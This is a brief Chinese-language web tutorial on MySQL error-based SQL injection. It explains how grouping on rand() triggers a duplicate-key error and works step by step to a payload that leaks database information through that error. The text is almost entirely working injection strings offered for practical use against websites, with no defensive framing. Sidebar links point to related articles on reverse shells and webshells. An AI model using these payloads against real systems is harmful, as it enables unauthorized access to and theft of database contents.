网站MYSQL数据库高级爆错注入原分析
这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652
grouping on certain parts of the result from rand, causes a duplicate key error.
重现过程:
于是便可以这样拿来爆错注入了。
select count(*),concat((select version()),left(rand(),3))x from inform<span style="line-height:1.5;">ation_schema.tables group by x;</span>
尝试拿来实战
select * from user where user='root' and (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x);
提示错误 选择的列应该为一个。那么。我们换一下
select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x));<span style="font-family:'sans serif', tahoma, verdana, helvetica;font-size:12px;line-height:1.5;"></span>
1248 (42000): Every derived table must have its own alias
提示多表查询要有别名 那好办
select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x)a);
或者
select * from user where user='root' and (select 1 from (select count(*),concat((select version()),left(rand(),3))x from information_schema.tables group by x) as lusiyu);
成功爆粗注入了.
您可能感兴趣的文章
- 12-02thinkphp代码执行getshell的漏洞解决
- 12-02Linux 下多种编程语言的反弹 shell 方法
- 12-02ASP+PHP 标准sql注入语句(完整版)
- 12-02XSS绕过技术 XSS插入绕过一些方式总结
- 12-02使用爬虫采集网站时,解决被封IP的几种方法
- 12-02浅谈史上最大DDoS攻击的本质与防范
- 12-02详解如何通过“鼠洞”控制电脑
- 12-02网站MYSQL数据库高级爆错注入原分析
- 12-02网站个人渗透技巧收集与总结
- 12-02劫持流量原理是什么?关于劫持流量的种类和产生
阅读排行
推荐教程
- 12-02XSS绕过技术 XSS插入绕过一些方式总结
- 12-02网站MYSQL数据库高级爆错注入原分析
- 12-02ASP+PHP 标准sql注入语句(完整版)
- 12-02SQL注入攻击(攻击与防范)
- 12-02各种网页挂马方式原理揭密(iframe挂马,script 挂马,图片伪装挂马等)
- 12-02thinkphp代码执行getshell的漏洞解决
- 12-02详解如何通过“鼠洞”控制电脑
- 12-02使用爬虫采集网站时,解决被封IP的几种方法
- 12-02网站个人渗透技巧收集与总结
- 12-02劫持流量原理是什么?关于劫持流量的种类和产生